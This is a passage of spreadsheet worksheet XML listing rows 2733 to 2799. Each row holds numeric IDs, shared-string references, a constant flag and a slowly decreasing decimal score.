    <row r="2733" ht="15.75" customHeight="1">
      <c r="A2733" s="1">
        <v>10029.0</v>
      </c>
      <c r="B2733" s="2">
        <v>5.7055232E7</v>
      </c>
      <c r="C2733" s="2" t="s">
        <v>2543</v>
      </c>
      <c r="D2733" s="2">
        <v>1.0</v>
      </c>
      <c r="E2733" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2733" s="2">
        <v>0.1593806921675775</v>
      </c>
    </row>
    <row r="2734" ht="15.75" customHeight="1">
      <c r="A2734" s="1">
        <v>12671.0</v>
      </c>
      <c r="B2734" s="2">
        <v>3.0587579E7</v>
      </c>
      <c r="C2734" s="2" t="s">
        <v>2544</v>
      </c>
      <c r="D2734" s="2">
        <v>1.0</v>
      </c>
      <c r="E2734" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2734" s="2">
        <v>0.1593137254901961</v>
      </c>
    </row>
    <row r="2735" ht="15.75" customHeight="1">
      <c r="A2735" s="1">
        <v>24169.0</v>
      </c>
      <c r="B2735" s="2">
        <v>1.0201377E7</v>
      </c>
      <c r="C2735" s="2" t="s">
        <v>2545</v>
      </c>
      <c r="D2735" s="2">
        <v>1.0</v>
      </c>
      <c r="E2735" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2735" s="2">
        <v>0.1590909090909091</v>
      </c>
    </row>
    <row r="2736" ht="15.75" customHeight="1">
      <c r="A2736" s="1">
        <v>3717.0</v>
      </c>
      <c r="B2736" s="2">
        <v>3.9606364E7</v>
      </c>
      <c r="C2736" s="2" t="s">
        <v>2546</v>
      </c>
      <c r="D2736" s="2">
        <v>1.0</v>
      </c>
      <c r="E2736" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2736" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="2737" ht="15.75" customHeight="1">
      <c r="A2737" s="1">
        <v>9440.0</v>
      </c>
      <c r="B2737" s="2">
        <v>5.5810951E7</v>
      </c>
      <c r="C2737" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="D2737" s="2">
        <v>1.0</v>
      </c>
      <c r="E2737" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2737" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="2738" ht="15.75" customHeight="1">
      <c r="A2738" s="1">
        <v>9565.0</v>
      </c>
      <c r="B2738" s="2">
        <v>5.6050329E7</v>
      </c>
      <c r="C2738" s="2" t="s">
        <v>2548</v>
      </c>
      <c r="D2738" s="2">
        <v>1.0</v>
      </c>
      <c r="E2738" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2738" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="2739" ht="15.75" customHeight="1">
      <c r="A2739" s="1">
        <v>13137.0</v>
      </c>
      <c r="B2739" s="2">
        <v>3.3716584E7</v>
      </c>
      <c r="C2739" s="2" t="s">
        <v>2549</v>
      </c>
      <c r="D2739" s="2">
        <v>1.0</v>
      </c>
      <c r="E2739" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2739" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="2740" ht="15.75" customHeight="1">
      <c r="A2740" s="1">
        <v>16987.0</v>
      </c>
      <c r="B2740" s="2">
        <v>4.8340177E7</v>
      </c>
      <c r="C2740" s="2" t="s">
        <v>2550</v>
      </c>
      <c r="D2740" s="2">
        <v>1.0</v>
      </c>
      <c r="E2740" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2740" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="2741" ht="15.75" customHeight="1">
      <c r="A2741" s="1">
        <v>5619.0</v>
      </c>
      <c r="B2741" s="2">
        <v>4.6181521E7</v>
      </c>
      <c r="C2741" s="2" t="s">
        <v>2551</v>
      </c>
      <c r="D2741" s="2">
        <v>1.0</v>
      </c>
      <c r="E2741" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2741" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="2742" ht="15.75" customHeight="1">
      <c r="A2742" s="1">
        <v>5998.0</v>
      </c>
      <c r="B2742" s="2">
        <v>4.7453057E7</v>
      </c>
      <c r="C2742" s="2" t="s">
        <v>2552</v>
      </c>
      <c r="D2742" s="2">
        <v>1.0</v>
      </c>
      <c r="E2742" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2742" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="2743" ht="15.75" customHeight="1">
      <c r="A2743" s="1">
        <v>10994.0</v>
      </c>
      <c r="B2743" s="2">
        <v>1.7440846E7</v>
      </c>
      <c r="C2743" s="2" t="s">
        <v>2553</v>
      </c>
      <c r="D2743" s="2">
        <v>1.0</v>
      </c>
      <c r="E2743" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2743" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="2744" ht="15.75" customHeight="1">
      <c r="A2744" s="1">
        <v>13103.0</v>
      </c>
      <c r="B2744" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C2744" s="2" t="s">
        <v>2554</v>
      </c>
      <c r="D2744" s="2">
        <v>1.0</v>
      </c>
      <c r="E2744" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2744" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="2745" ht="15.75" customHeight="1">
      <c r="A2745" s="1">
        <v>17426.0</v>
      </c>
      <c r="B2745" s="2">
        <v>4.9716272E7</v>
      </c>
      <c r="C2745" s="2" t="s">
        <v>2555</v>
      </c>
      <c r="D2745" s="2">
        <v>1.0</v>
      </c>
      <c r="E2745" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2745" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="2746" ht="15.75" customHeight="1">
      <c r="A2746" s="1">
        <v>6645.0</v>
      </c>
      <c r="B2746" s="2">
        <v>4.9083939E7</v>
      </c>
      <c r="C2746" s="2" t="s">
        <v>2556</v>
      </c>
      <c r="D2746" s="2">
        <v>1.0</v>
      </c>
      <c r="E2746" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2746" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="2747" ht="15.75" customHeight="1">
      <c r="A2747" s="1">
        <v>18525.0</v>
      </c>
      <c r="B2747" s="2">
        <v>5.3022872E7</v>
      </c>
      <c r="C2747" s="2" t="s">
        <v>2557</v>
      </c>
      <c r="D2747" s="2">
        <v>1.0</v>
      </c>
      <c r="E2747" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2747" s="2">
        <v>0.1574074074074074</v>
      </c>
    </row>
    <row r="2748" ht="15.75" customHeight="1">
      <c r="A2748" s="1">
        <v>5314.0</v>
      </c>
      <c r="B2748" s="2">
        <v>4.5278626E7</v>
      </c>
      <c r="C2748" s="2" t="s">
        <v>2558</v>
      </c>
      <c r="D2748" s="2">
        <v>1.0</v>
      </c>
      <c r="E2748" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2748" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="2749" ht="15.75" customHeight="1">
      <c r="A2749" s="1">
        <v>14226.0</v>
      </c>
      <c r="B2749" s="2">
        <v>3.8284912E7</v>
      </c>
      <c r="C2749" s="2" t="s">
        <v>2559</v>
      </c>
      <c r="D2749" s="2">
        <v>1.0</v>
      </c>
      <c r="E2749" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2749" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="2750" ht="15.75" customHeight="1">
      <c r="A2750" s="1">
        <v>9027.0</v>
      </c>
      <c r="B2750" s="2">
        <v>5.5023416E7</v>
      </c>
      <c r="C2750" s="2" t="s">
        <v>2560</v>
      </c>
      <c r="D2750" s="2">
        <v>1.0</v>
      </c>
      <c r="E2750" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2750" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="2751" ht="15.75" customHeight="1">
      <c r="A2751" s="1">
        <v>1379.0</v>
      </c>
      <c r="B2751" s="2">
        <v>2.6085289E7</v>
      </c>
      <c r="C2751" s="2" t="s">
        <v>2561</v>
      </c>
      <c r="D2751" s="2">
        <v>1.0</v>
      </c>
      <c r="E2751" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2751" s="2">
        <v>0.1567164179104478</v>
      </c>
    </row>
    <row r="2752" ht="15.75" customHeight="1">
      <c r="A2752" s="1">
        <v>1430.0</v>
      </c>
      <c r="B2752" s="2">
        <v>2.6608276E7</v>
      </c>
      <c r="C2752" s="2" t="s">
        <v>2562</v>
      </c>
      <c r="D2752" s="2">
        <v>1.0</v>
      </c>
      <c r="E2752" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2752" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="2753" ht="15.75" customHeight="1">
      <c r="A2753" s="1">
        <v>3193.0</v>
      </c>
      <c r="B2753" s="2">
        <v>3.7227048E7</v>
      </c>
      <c r="C2753" s="2" t="s">
        <v>2563</v>
      </c>
      <c r="D2753" s="2">
        <v>1.0</v>
      </c>
      <c r="E2753" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2753" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="2754" ht="15.75" customHeight="1">
      <c r="A2754" s="1">
        <v>12365.0</v>
      </c>
      <c r="B2754" s="2">
        <v>2.8762979E7</v>
      </c>
      <c r="C2754" s="2" t="s">
        <v>2564</v>
      </c>
      <c r="D2754" s="2">
        <v>1.0</v>
      </c>
      <c r="E2754" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2754" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="2755" ht="15.75" customHeight="1">
      <c r="A2755" s="1">
        <v>14679.0</v>
      </c>
      <c r="B2755" s="2">
        <v>4.0485969E7</v>
      </c>
      <c r="C2755" s="2" t="s">
        <v>2565</v>
      </c>
      <c r="D2755" s="2">
        <v>1.0</v>
      </c>
      <c r="E2755" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2755" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="2756" ht="15.75" customHeight="1">
      <c r="A2756" s="1">
        <v>10880.0</v>
      </c>
      <c r="B2756" s="2">
        <v>1.6492089E7</v>
      </c>
      <c r="C2756" s="2" t="s">
        <v>2566</v>
      </c>
      <c r="D2756" s="2">
        <v>1.0</v>
      </c>
      <c r="E2756" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2756" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="2757" ht="15.75" customHeight="1">
      <c r="A2757" s="1">
        <v>2567.0</v>
      </c>
      <c r="B2757" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C2757" s="2" t="s">
        <v>2567</v>
      </c>
      <c r="D2757" s="2">
        <v>1.0</v>
      </c>
      <c r="E2757" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2757" s="2">
        <v>0.1557239057239058</v>
      </c>
    </row>
    <row r="2758" ht="15.75" customHeight="1">
      <c r="A2758" s="1">
        <v>26243.0</v>
      </c>
      <c r="B2758" s="2">
        <v>1.6294705E7</v>
      </c>
      <c r="C2758" s="2" t="s">
        <v>2568</v>
      </c>
      <c r="D2758" s="2">
        <v>1.0</v>
      </c>
      <c r="E2758" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2758" s="2">
        <v>0.1557239057239057</v>
      </c>
    </row>
    <row r="2759" ht="15.75" customHeight="1">
      <c r="A2759" s="1">
        <v>11781.0</v>
      </c>
      <c r="B2759" s="2">
        <v>2.4294375E7</v>
      </c>
      <c r="C2759" s="2" t="s">
        <v>2569</v>
      </c>
      <c r="D2759" s="2">
        <v>1.0</v>
      </c>
      <c r="E2759" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2759" s="2">
        <v>0.155701754385965</v>
      </c>
    </row>
    <row r="2760" ht="15.75" customHeight="1">
      <c r="A2760" s="1">
        <v>7849.0</v>
      </c>
      <c r="B2760" s="2">
        <v>5.2341821E7</v>
      </c>
      <c r="C2760" s="2" t="s">
        <v>2570</v>
      </c>
      <c r="D2760" s="2">
        <v>1.0</v>
      </c>
      <c r="E2760" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2760" s="2">
        <v>0.1554232804232804</v>
      </c>
    </row>
    <row r="2761" ht="15.75" customHeight="1">
      <c r="A2761" s="1">
        <v>5620.0</v>
      </c>
      <c r="B2761" s="2">
        <v>4.6181521E7</v>
      </c>
      <c r="C2761" s="2" t="s">
        <v>2571</v>
      </c>
      <c r="D2761" s="2">
        <v>1.0</v>
      </c>
      <c r="E2761" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2761" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="2762" ht="15.75" customHeight="1">
      <c r="A2762" s="1">
        <v>10483.0</v>
      </c>
      <c r="B2762" s="2">
        <v>1.0985467E7</v>
      </c>
      <c r="C2762" s="2" t="s">
        <v>2572</v>
      </c>
      <c r="D2762" s="2">
        <v>1.0</v>
      </c>
      <c r="E2762" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2762" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="2763" ht="15.75" customHeight="1">
      <c r="A2763" s="1">
        <v>13865.0</v>
      </c>
      <c r="B2763" s="2">
        <v>3.6945432E7</v>
      </c>
      <c r="C2763" s="2" t="s">
        <v>2573</v>
      </c>
      <c r="D2763" s="2">
        <v>1.0</v>
      </c>
      <c r="E2763" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2763" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="2764" ht="15.75" customHeight="1">
      <c r="A2764" s="1">
        <v>16443.0</v>
      </c>
      <c r="B2764" s="2">
        <v>4.6397049E7</v>
      </c>
      <c r="C2764" s="2" t="s">
        <v>2574</v>
      </c>
      <c r="D2764" s="2">
        <v>1.0</v>
      </c>
      <c r="E2764" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2764" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="2765" ht="15.75" customHeight="1">
      <c r="A2765" s="1">
        <v>17827.0</v>
      </c>
      <c r="B2765" s="2">
        <v>5.0916034E7</v>
      </c>
      <c r="C2765" s="2" t="s">
        <v>2575</v>
      </c>
      <c r="D2765" s="2">
        <v>1.0</v>
      </c>
      <c r="E2765" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2765" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="2766" ht="15.75" customHeight="1">
      <c r="A2766" s="1">
        <v>6331.0</v>
      </c>
      <c r="B2766" s="2">
        <v>4.8291993E7</v>
      </c>
      <c r="C2766" s="2" t="s">
        <v>2576</v>
      </c>
      <c r="D2766" s="2">
        <v>1.0</v>
      </c>
      <c r="E2766" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2766" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="2767" ht="15.75" customHeight="1">
      <c r="A2767" s="1">
        <v>2080.0</v>
      </c>
      <c r="B2767" s="2">
        <v>3.116791E7</v>
      </c>
      <c r="C2767" s="2" t="s">
        <v>2577</v>
      </c>
      <c r="D2767" s="2">
        <v>1.0</v>
      </c>
      <c r="E2767" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2767" s="2">
        <v>0.1545454545454545</v>
      </c>
    </row>
    <row r="2768" ht="15.75" customHeight="1">
      <c r="A2768" s="1">
        <v>1558.0</v>
      </c>
      <c r="B2768" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C2768" s="2" t="s">
        <v>2578</v>
      </c>
      <c r="D2768" s="2">
        <v>1.0</v>
      </c>
      <c r="E2768" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2768" s="2">
        <v>0.1544901065449011</v>
      </c>
    </row>
    <row r="2769" ht="15.75" customHeight="1">
      <c r="A2769" s="1">
        <v>17967.0</v>
      </c>
      <c r="B2769" s="2">
        <v>5.1353516E7</v>
      </c>
      <c r="C2769" s="2" t="s">
        <v>2579</v>
      </c>
      <c r="D2769" s="2">
        <v>1.0</v>
      </c>
      <c r="E2769" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2769" s="2">
        <v>0.1542145593869733</v>
      </c>
    </row>
    <row r="2770" ht="15.75" customHeight="1">
      <c r="A2770" s="1">
        <v>15512.0</v>
      </c>
      <c r="B2770" s="2">
        <v>4.3265769E7</v>
      </c>
      <c r="C2770" s="2" t="s">
        <v>2580</v>
      </c>
      <c r="D2770" s="2">
        <v>1.0</v>
      </c>
      <c r="E2770" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2770" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="2771" ht="15.75" customHeight="1">
      <c r="A2771" s="1">
        <v>13858.0</v>
      </c>
      <c r="B2771" s="2">
        <v>3.692713E7</v>
      </c>
      <c r="C2771" s="2" t="s">
        <v>2581</v>
      </c>
      <c r="D2771" s="2">
        <v>1.0</v>
      </c>
      <c r="E2771" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2771" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="2772" ht="15.75" customHeight="1">
      <c r="A2772" s="1">
        <v>16463.0</v>
      </c>
      <c r="B2772" s="2">
        <v>4.6457783E7</v>
      </c>
      <c r="C2772" s="2" t="s">
        <v>2582</v>
      </c>
      <c r="D2772" s="2">
        <v>1.0</v>
      </c>
      <c r="E2772" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2772" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="2773" ht="15.75" customHeight="1">
      <c r="A2773" s="1">
        <v>4664.0</v>
      </c>
      <c r="B2773" s="2">
        <v>4.3135505E7</v>
      </c>
      <c r="C2773" s="2" t="s">
        <v>2583</v>
      </c>
      <c r="D2773" s="2">
        <v>1.0</v>
      </c>
      <c r="E2773" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2773" s="2">
        <v>0.1539162112932605</v>
      </c>
    </row>
    <row r="2774" ht="15.75" customHeight="1">
      <c r="A2774" s="1">
        <v>2647.0</v>
      </c>
      <c r="B2774" s="2">
        <v>3.466161E7</v>
      </c>
      <c r="C2774" s="2" t="s">
        <v>2584</v>
      </c>
      <c r="D2774" s="2">
        <v>1.0</v>
      </c>
      <c r="E2774" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2774" s="2">
        <v>0.1537842190016104</v>
      </c>
    </row>
    <row r="2775" ht="15.75" customHeight="1">
      <c r="A2775" s="1">
        <v>4971.0</v>
      </c>
      <c r="B2775" s="2">
        <v>4.4099577E7</v>
      </c>
      <c r="C2775" s="2" t="s">
        <v>2585</v>
      </c>
      <c r="D2775" s="2">
        <v>1.0</v>
      </c>
      <c r="E2775" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2775" s="2">
        <v>0.1535493827160495</v>
      </c>
    </row>
    <row r="2776" ht="15.75" customHeight="1">
      <c r="A2776" s="1">
        <v>6822.0</v>
      </c>
      <c r="B2776" s="2">
        <v>4.9557233E7</v>
      </c>
      <c r="C2776" s="2" t="s">
        <v>2586</v>
      </c>
      <c r="D2776" s="2">
        <v>1.0</v>
      </c>
      <c r="E2776" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2776" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="2777" ht="15.75" customHeight="1">
      <c r="A2777" s="1">
        <v>18141.0</v>
      </c>
      <c r="B2777" s="2">
        <v>5.1831063E7</v>
      </c>
      <c r="C2777" s="2" t="s">
        <v>2587</v>
      </c>
      <c r="D2777" s="2">
        <v>1.0</v>
      </c>
      <c r="E2777" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2777" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="2778" ht="15.75" customHeight="1">
      <c r="A2778" s="1">
        <v>5268.0</v>
      </c>
      <c r="B2778" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C2778" s="2" t="s">
        <v>2588</v>
      </c>
      <c r="D2778" s="2">
        <v>1.0</v>
      </c>
      <c r="E2778" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2778" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="2779" ht="15.75" customHeight="1">
      <c r="A2779" s="1">
        <v>9778.0</v>
      </c>
      <c r="B2779" s="2">
        <v>5.6511826E7</v>
      </c>
      <c r="C2779" s="2" t="s">
        <v>2589</v>
      </c>
      <c r="D2779" s="2">
        <v>1.0</v>
      </c>
      <c r="E2779" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2779" s="2">
        <v>0.153225806451613</v>
      </c>
    </row>
    <row r="2780" ht="15.75" customHeight="1">
      <c r="A2780" s="1">
        <v>4107.0</v>
      </c>
      <c r="B2780" s="2">
        <v>4.1336594E7</v>
      </c>
      <c r="C2780" s="2" t="s">
        <v>2590</v>
      </c>
      <c r="D2780" s="2">
        <v>1.0</v>
      </c>
      <c r="E2780" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2780" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="2781" ht="15.75" customHeight="1">
      <c r="A2781" s="1">
        <v>3679.0</v>
      </c>
      <c r="B2781" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C2781" s="2" t="s">
        <v>2591</v>
      </c>
      <c r="D2781" s="2">
        <v>1.0</v>
      </c>
      <c r="E2781" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2781" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="2782" ht="15.75" customHeight="1">
      <c r="A2782" s="1">
        <v>1750.0</v>
      </c>
      <c r="B2782" s="2">
        <v>2.8854813E7</v>
      </c>
      <c r="C2782" s="2" t="s">
        <v>2592</v>
      </c>
      <c r="D2782" s="2">
        <v>1.0</v>
      </c>
      <c r="E2782" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2782" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="2783" ht="15.75" customHeight="1">
      <c r="A2783" s="1">
        <v>4863.0</v>
      </c>
      <c r="B2783" s="2">
        <v>4.3812596E7</v>
      </c>
      <c r="C2783" s="2" t="s">
        <v>2593</v>
      </c>
      <c r="D2783" s="2">
        <v>1.0</v>
      </c>
      <c r="E2783" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2783" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="2784" ht="15.75" customHeight="1">
      <c r="A2784" s="1">
        <v>8082.0</v>
      </c>
      <c r="B2784" s="2">
        <v>5.3030564E7</v>
      </c>
      <c r="C2784" s="2" t="s">
        <v>2594</v>
      </c>
      <c r="D2784" s="2">
        <v>1.0</v>
      </c>
      <c r="E2784" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2784" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="2785" ht="15.75" customHeight="1">
      <c r="A2785" s="1">
        <v>11825.0</v>
      </c>
      <c r="B2785" s="2">
        <v>2.4636493E7</v>
      </c>
      <c r="C2785" s="2" t="s">
        <v>2595</v>
      </c>
      <c r="D2785" s="2">
        <v>1.0</v>
      </c>
      <c r="E2785" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2785" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="2786" ht="15.75" customHeight="1">
      <c r="A2786" s="1">
        <v>15156.0</v>
      </c>
      <c r="B2786" s="2">
        <v>4.1972493E7</v>
      </c>
      <c r="C2786" s="2" t="s">
        <v>2596</v>
      </c>
      <c r="D2786" s="2">
        <v>1.0</v>
      </c>
      <c r="E2786" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2786" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="2787" ht="15.75" customHeight="1">
      <c r="A2787" s="1">
        <v>9.0</v>
      </c>
      <c r="B2787" s="2">
        <v>1.0219034E7</v>
      </c>
      <c r="C2787" s="2" t="s">
        <v>2597</v>
      </c>
      <c r="D2787" s="2">
        <v>1.0</v>
      </c>
      <c r="E2787" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2787" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="2788" ht="15.75" customHeight="1">
      <c r="A2788" s="1">
        <v>5779.0</v>
      </c>
      <c r="B2788" s="2">
        <v>4.6736158E7</v>
      </c>
      <c r="C2788" s="2" t="s">
        <v>2598</v>
      </c>
      <c r="D2788" s="2">
        <v>1.0</v>
      </c>
      <c r="E2788" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2788" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="2789" ht="15.75" customHeight="1">
      <c r="A2789" s="1">
        <v>12238.0</v>
      </c>
      <c r="B2789" s="2">
        <v>2.7882119E7</v>
      </c>
      <c r="C2789" s="2" t="s">
        <v>2599</v>
      </c>
      <c r="D2789" s="2">
        <v>1.0</v>
      </c>
      <c r="E2789" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2789" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="2790" ht="15.75" customHeight="1">
      <c r="A2790" s="1">
        <v>19960.0</v>
      </c>
      <c r="B2790" s="2">
        <v>5.7542265E7</v>
      </c>
      <c r="C2790" s="2" t="s">
        <v>2600</v>
      </c>
      <c r="D2790" s="2">
        <v>1.0</v>
      </c>
      <c r="E2790" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2790" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="2791" ht="15.75" customHeight="1">
      <c r="A2791" s="1">
        <v>6419.0</v>
      </c>
      <c r="B2791" s="2">
        <v>4.8541108E7</v>
      </c>
      <c r="C2791" s="2" t="s">
        <v>2601</v>
      </c>
      <c r="D2791" s="2">
        <v>1.0</v>
      </c>
      <c r="E2791" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2791" s="2">
        <v>0.1520833333333333</v>
      </c>
    </row>
    <row r="2792" ht="15.75" customHeight="1">
      <c r="A2792" s="1">
        <v>11424.0</v>
      </c>
      <c r="B2792" s="2">
        <v>2.1735861E7</v>
      </c>
      <c r="C2792" s="2" t="s">
        <v>2602</v>
      </c>
      <c r="D2792" s="2">
        <v>1.0</v>
      </c>
      <c r="E2792" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2792" s="2">
        <v>0.1517857142857144</v>
      </c>
    </row>
    <row r="2793" ht="15.75" customHeight="1">
      <c r="A2793" s="1">
        <v>32519.0</v>
      </c>
      <c r="B2793" s="2">
        <v>5720890.0</v>
      </c>
      <c r="C2793" s="2" t="s">
        <v>2603</v>
      </c>
      <c r="D2793" s="2">
        <v>1.0</v>
      </c>
      <c r="E2793" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2793" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="2794" ht="15.75" customHeight="1">
      <c r="A2794" s="1">
        <v>3125.0</v>
      </c>
      <c r="B2794" s="2">
        <v>3.6838527E7</v>
      </c>
      <c r="C2794" s="2" t="s">
        <v>2604</v>
      </c>
      <c r="D2794" s="2">
        <v>1.0</v>
      </c>
      <c r="E2794" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2794" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="2795" ht="15.75" customHeight="1">
      <c r="A2795" s="1">
        <v>6502.0</v>
      </c>
      <c r="B2795" s="2">
        <v>4.8714942E7</v>
      </c>
      <c r="C2795" s="2" t="s">
        <v>2605</v>
      </c>
      <c r="D2795" s="2">
        <v>1.0</v>
      </c>
      <c r="E2795" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2795" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="2796" ht="15.75" customHeight="1">
      <c r="A2796" s="1">
        <v>2892.0</v>
      </c>
      <c r="B2796" s="2">
        <v>3.572609E7</v>
      </c>
      <c r="C2796" s="2" t="s">
        <v>2606</v>
      </c>
      <c r="D2796" s="2">
        <v>1.0</v>
      </c>
      <c r="E2796" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2796" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="2797" ht="15.75" customHeight="1">
      <c r="A2797" s="1">
        <v>9963.0</v>
      </c>
      <c r="B2797" s="2">
        <v>5.6929233E7</v>
      </c>
      <c r="C2797" s="2" t="s">
        <v>2607</v>
      </c>
      <c r="D2797" s="2">
        <v>1.0</v>
      </c>
      <c r="E2797" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2797" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="2798" ht="15.75" customHeight="1">
      <c r="A2798" s="1">
        <v>15854.0</v>
      </c>
      <c r="B2798" s="2">
        <v>4.4462922E7</v>
      </c>
      <c r="C2798" s="2" t="s">
        <v>2608</v>
      </c>
      <c r="D2798" s="2">
        <v>1.0</v>
      </c>
      <c r="E2798" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2798" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="2799" ht="15.75" customHeight="1">
      <c r="A2799" s="1">
        <v>18954.0</v>
      </c>
      <c r="B2799" s="2">
        <v>5.4351657E7</v>
      </c>
      <c r="C2799" s="2" t="s">
        <v>2609</v>
      </c>
      <c r="D2799" s="2">
        <v>1.0</v>
      </c>
      <c r="E2799" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2799" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
